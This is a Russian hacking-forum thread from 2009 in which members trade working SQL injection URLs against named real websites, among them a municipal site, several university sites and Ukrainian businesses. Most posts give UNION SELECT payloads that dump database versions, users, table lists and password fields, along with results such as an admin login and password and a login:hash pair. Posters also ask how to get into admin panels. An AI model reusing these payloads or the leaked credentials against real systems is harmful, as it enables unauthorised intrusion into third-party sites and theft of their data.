Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
12.01.2009, 04:42
|
|
Новичок
Регистрация: 21.01.2008
Сообщений: 4
Провел на форуме:
22394
Репутация:
0
|
|
посмотрите понять не могу чего за уязвимость http://dasha.com.ua/wellness_descr.php?page=i3%27
|
|
|
12.01.2009, 04:59
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
это не скуля и уязвимости тут вроде как нет,ковычки итд экранируются и расширение не отбросить
Последний раз редактировалось ILYAtirtir; 12.01.2009 в 05:03..
|
|
|
|
12.01.2009, 05:11
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
http://walaber.com/index.php?action=showitem&id=-19+union+select+1,2,3,4,concat_ws(0x3a3a,version() ,user(),database()),6,7,8,9,10,11,12--
Version:5.0.45-log
User:walaber@cgi1403.int.bizland.net
Database:walaber_db
http://www.carbodydesign.com/video/?id=999992220+union+select+1,2,3,4,5,6,7,8,9,conca t_ws(0x3a3a,version(),user(),database()),11,12,13, 14,15,16,17,18,19,20,21--
Version:5.0.24a-log
User:u70469981@cgihost
Database:d60425765
|
|
|
|
12.01.2009, 10:33
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485
Репутация:
4
|
|
Наконец то первая скуль которую сам нашёл и роскрутил!!!
Всем огромное за это спасибо!
Код:
http://www.yalta.org.ua/pages/firm.php?id=-1772%20union%20select%201,version(),3,4,user(),database(),7,8,9,10,11,12,13,14,15
version : 5.0.51a-15
user : u_admin_yalta@localhost
database: admin_yalta
Код:
http://www.yalta.org.ua/pages/firm.php?id=-1772%20union%20select%201,nick,3,4,password,6,7,8,9,10,11,12,13,14,15%20%20FROM%20user_data%20%20LIMIT%201,1
login:TopAdmin
password:878960
админка http://www.yalta.org.ua/admin/
тока когда ввожу данные, не заходит..не подскажите чё? |
|
|
|
12.01.2009, 11:58
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485
Репутация:
4
|
|
муниципальный сайт города Алушта
Код:
http://www.alushta.crimea.ua/rest/obj/type_obj.php?o=-15%20union%20select%20version(),2,user(),database(),5,6,7,8,9,10,11,12%20--
version: 5.0.67-log
user: u7048@10.10.153.177
database: u7048
Код:
http://www.alushta.crimea.ua/rest/obj/type_obj.php?o=-15%20union%20select%20TABLE_NAME,2,3,4,5,6,7,8,9,10,11,12%20%20FROM%20INFORMATION_SCHEMA.TABLES%20--
имена таблиц
тока есть трабла, при запросе любой таблицы, типа
Код:
http://www.alushta.crimea.ua/rest/obj/type_obj.php?o=-15%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12%20%20FROM%20dn05_users%20--
выдаёт ошибку Table 'u7048.dn05_users' doesn't exist
чё за бред, подскажите |
|
|
|
12.01.2009, 12:21
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Табла лежит в другой бд.
Код:
http://www.alushta.crimea.ua/rest/obj/type_obj.php?o=-15+union+select+concat_ws(0x3a,table_schema,table_rows,TABLE_NAMe),2,3,4,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES--
К тому же, табла dn05_users - пустая.
Зато есть таблица 4images_users.. |
|
|
|
12.01.2009, 15:34
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485
Репутация:
4
|
|
Сообщение от R1dex
Табла лежит в другой бд.
Код:
http://www.alushta.crimea.ua/rest/obj/type_obj.php?o=-15+union+select+concat_ws(0x3a,table_schema,table_rows,TABLE_NAMe),2,3,4,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES--
К тому же, табла dn05_users - пустая.
Зато есть таблица 4images_users.. нашёл, спасибо за инфу....помогло в двух скулях
|
|
|
|
12.01.2009, 15:38
|
|
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
Провел на форуме:
1122391
Репутация:
209
|
|
history.arizona.edu
http://history.arizona.edu/events/story.php?id=-197+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat (user(),0x2f,version(),0x2f,database()),14,15,16,1 7,18,19,20,21,22,23/*
user() - history@localhost
database() - history
version() - 4.0.12
www.coastal.edu
http://www.coastal.edu/news/story.php?id=1212+union+select+1,password,3,4,5,6, 7,8,9,10,11+from+mysql.user/*
www.housing.wisc.edu
http://www.housing.wisc.edu/resnet/news/story.php?id=-74+union+select+1,2,3,4,5,password,7,8,9,10+from+m ysql.user/*
Последний раз редактировалось 1NtR0; 13.01.2009 в 00:56..
|
|
|
|
13.01.2009, 01:25
|
|
Новичок
Регистрация: 21.01.2008
Сообщений: 4
Провел на форуме:
22394
Репутация:
0
|
|
Код:
http://www.ecominfo.spb.ru/news/index.php?id=-1186+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
version()=5.0.24a
дальше не смог раскрутить может кто попробует раскрутить |
|
|
|
13.01.2009, 03:24
|
|
Новичок
Регистрация: 21.01.2008
Сообщений: 4
Провел на форуме:
22394
Репутация:
0
|
|
Код:
http://www.natpress.net/stat.php?id=-3329+union+select+1,2,3,4,5,concat(login,char(58),pass),7,8,9,10+from+user--
админку не нашел
admin:9605e8702d88 |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
